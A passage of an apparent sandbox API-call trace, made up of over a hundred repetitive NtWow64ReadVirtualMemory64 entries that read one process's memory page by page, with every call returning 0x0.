NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.259] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee38c000, Buffer=0x7ff8, BufferSize=0x258c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.259] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee38d000, Buffer=0x7ff8, BufferSize=0x258d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.259] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee38e000, Buffer=0x7ff8, BufferSize=0x258e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.260] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee38f000, Buffer=0x7ff8, BufferSize=0x258f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.260] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee390000, Buffer=0x7ff8, BufferSize=0x2590000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.260] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee391000, Buffer=0x7ff8, BufferSize=0x2591000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.260] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee392000, Buffer=0x7ff8, BufferSize=0x2592000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.260] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee393000, Buffer=0x7ff8, BufferSize=0x2593000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.261] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee394000, Buffer=0x7ff8, BufferSize=0x2594000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.261] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee395000, Buffer=0x7ff8, BufferSize=0x2595000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.261] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee396000, Buffer=0x7ff8, BufferSize=0x2596000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.261] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee397000, Buffer=0x7ff8, BufferSize=0x2597000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.261] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee398000, Buffer=0x7ff8, BufferSize=0x2598000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.262] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee399000, Buffer=0x7ff8, BufferSize=0x2599000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.262] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee39a000, Buffer=0x7ff8, BufferSize=0x259a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.262] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee39b000, Buffer=0x7ff8, BufferSize=0x259b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.262] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee39c000, Buffer=0x7ff8, BufferSize=0x259c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.262] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee39d000, Buffer=0x7ff8, BufferSize=0x259d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.263] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee39e000, Buffer=0x7ff8, BufferSize=0x259e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.263] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee39f000, Buffer=0x7ff8, BufferSize=0x259f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.263] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3a0000, Buffer=0x7ff8, BufferSize=0x25a0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.263] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3a1000, Buffer=0x7ff8, BufferSize=0x25a1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.263] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3a2000, Buffer=0x7ff8, BufferSize=0x25a2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.263] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3a3000, Buffer=0x7ff8, BufferSize=0x25a3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.263] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3a4000, Buffer=0x7ff8, BufferSize=0x25a4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.264] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3a5000, Buffer=0x7ff8, BufferSize=0x25a5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.264] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3a6000, Buffer=0x7ff8, BufferSize=0x25a6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.264] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3a7000, Buffer=0x7ff8, BufferSize=0x25a7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.264] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3a8000, Buffer=0x7ff8, BufferSize=0x25a8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.264] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3a9000, Buffer=0x7ff8, BufferSize=0x25a9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.264] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3aa000, Buffer=0x7ff8, BufferSize=0x25aa000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.264] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3ab000, Buffer=0x7ff8, BufferSize=0x25ab000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.265] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3ac000, Buffer=0x7ff8, BufferSize=0x25ac000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.265] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3ad000, Buffer=0x7ff8, BufferSize=0x25ad000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.265] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3ae000, Buffer=0x7ff8, BufferSize=0x25ae000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.265] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3af000, Buffer=0x7ff8, BufferSize=0x25af000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.265] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3b0000, Buffer=0x7ff8, BufferSize=0x25b0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.265] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3b1000, Buffer=0x7ff8, BufferSize=0x25b1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.265] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3b2000, Buffer=0x7ff8, BufferSize=0x25b2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.266] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3b3000, Buffer=0x7ff8, BufferSize=0x25b3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.266] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3b4000, Buffer=0x7ff8, BufferSize=0x25b4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.266] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3b5000, Buffer=0x7ff8, BufferSize=0x25b5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.266] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3b6000, Buffer=0x7ff8, BufferSize=0x25b6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.266] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3b7000, Buffer=0x7ff8, BufferSize=0x25b7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.266] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3b8000, Buffer=0x7ff8, BufferSize=0x25b8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.267] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3b9000, Buffer=0x7ff8, BufferSize=0x25b9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.267] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3ba000, Buffer=0x7ff8, BufferSize=0x25ba000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.267] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3bb000, Buffer=0x7ff8, BufferSize=0x25bb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.267] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3bc000, Buffer=0x7ff8, BufferSize=0x25bc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.267] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3bd000, Buffer=0x7ff8, BufferSize=0x25bd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.267] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3be000, Buffer=0x7ff8, BufferSize=0x25be000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.268] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3bf000, Buffer=0x7ff8, BufferSize=0x25bf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.268] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3c0000, Buffer=0x7ff8, BufferSize=0x25c0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.268] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3c1000, Buffer=0x7ff8, BufferSize=0x25c1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.268] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3c2000, Buffer=0x7ff8, BufferSize=0x25c2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.268] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3c3000, Buffer=0x7ff8, BufferSize=0x25c3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.268] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3c4000, Buffer=0x7ff8, BufferSize=0x25c4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.268] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3c5000, Buffer=0x7ff8, BufferSize=0x25c5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.269] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3c6000, Buffer=0x7ff8, BufferSize=0x25c6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.269] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3c7000, Buffer=0x7ff8, BufferSize=0x25c7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.269] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3c8000, Buffer=0x7ff8, BufferSize=0x25c8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.269] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3c9000, Buffer=0x7ff8, BufferSize=0x25c9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.269] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3ca000, Buffer=0x7ff8, BufferSize=0x25ca000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.269] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3cb000, Buffer=0x7ff8, BufferSize=0x25cb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.270] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3cc000, Buffer=0x7ff8, BufferSize=0x25cc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.270] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3cd000, Buffer=0x7ff8, BufferSize=0x25cd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.270] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3ce000, Buffer=0x7ff8, BufferSize=0x25ce000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.270] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3cf000, Buffer=0x7ff8, BufferSize=0x25cf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.270] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3d0000, Buffer=0x7ff8, BufferSize=0x25d0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.270] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3d1000, Buffer=0x7ff8, BufferSize=0x25d1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.271] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3d2000, Buffer=0x7ff8, BufferSize=0x25d2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.271] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3d3000, Buffer=0x7ff8, BufferSize=0x25d3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.271] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3d4000, Buffer=0x7ff8, BufferSize=0x25d4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.271] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3d5000, Buffer=0x7ff8, BufferSize=0x25d5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.271] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3d6000, Buffer=0x7ff8, BufferSize=0x25d6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.272] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3d7000, Buffer=0x7ff8, BufferSize=0x25d7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.272] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3d8000, Buffer=0x7ff8, BufferSize=0x25d8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.272] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3d9000, Buffer=0x7ff8, BufferSize=0x25d9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.272] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3da000, Buffer=0x7ff8, BufferSize=0x25da000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.272] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3db000, Buffer=0x7ff8, BufferSize=0x25db000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.273] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3dc000, Buffer=0x7ff8, BufferSize=0x25dc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.273] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3dd000, Buffer=0x7ff8, BufferSize=0x25dd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.273] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3de000, Buffer=0x7ff8, BufferSize=0x25de000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.273] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3df000, Buffer=0x7ff8, BufferSize=0x25df000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.273] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3e0000, Buffer=0x7ff8, BufferSize=0x25e0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.273] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3e1000, Buffer=0x7ff8, BufferSize=0x25e1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.274] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3e2000, Buffer=0x7ff8, BufferSize=0x25e2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.274] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3e3000, Buffer=0x7ff8, BufferSize=0x25e3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.274] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3e4000, Buffer=0x7ff8, BufferSize=0x25e4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.274] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3e5000, Buffer=0x7ff8, BufferSize=0x25e5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.274] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3e6000, Buffer=0x7ff8, BufferSize=0x25e6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.274] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3e7000, Buffer=0x7ff8, BufferSize=0x25e7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.275] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3e8000, Buffer=0x7ff8, BufferSize=0x25e8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.275] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3e9000, Buffer=0x7ff8, BufferSize=0x25e9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.275] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3ea000, Buffer=0x7ff8, BufferSize=0x25ea000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.275] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3eb000, Buffer=0x7ff8, BufferSize=0x25eb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.275] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3ec000, Buffer=0x7ff8, BufferSize=0x25ec000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.275] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3ed000, Buffer=0x7ff8, BufferSize=0x25ed000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.275] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3ee000, Buffer=0x7ff8, BufferSize=0x25ee000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.276] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3ef000, Buffer=0x7ff8, BufferSize=0x25ef000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.276] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3f0000, Buffer=0x7ff8, BufferSize=0x25f0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.276] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3f1000, Buffer=0x7ff8, BufferSize=0x25f1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.277] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3f2000, Buffer=0x7ff8, BufferSize=0x25f2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.277] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3f3000, Buffer=0x7ff8, BufferSize=0x25f3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.277] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3f4000, Buffer=0x7ff8, BufferSize=0x25f4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.277] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3f5000, Buffer=0x7ff8, BufferSize=0x25f5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.277] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3f6000, Buffer=0x7ff8, BufferSize=0x25f6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.277] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3f7000, Buffer=0x7ff8, BufferSize=0x25f7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.277] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3f8000, Buffer=0x7ff8, BufferSize=0x25f8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.278] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3f9000, Buffer=0x7ff8, BufferSize=0x25f9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.278] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3fa000, Buffer=0x7ff8, BufferSize=0x25fa000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.278] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3fb000, Buffer=0x7ff8, BufferSize=0x25fb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 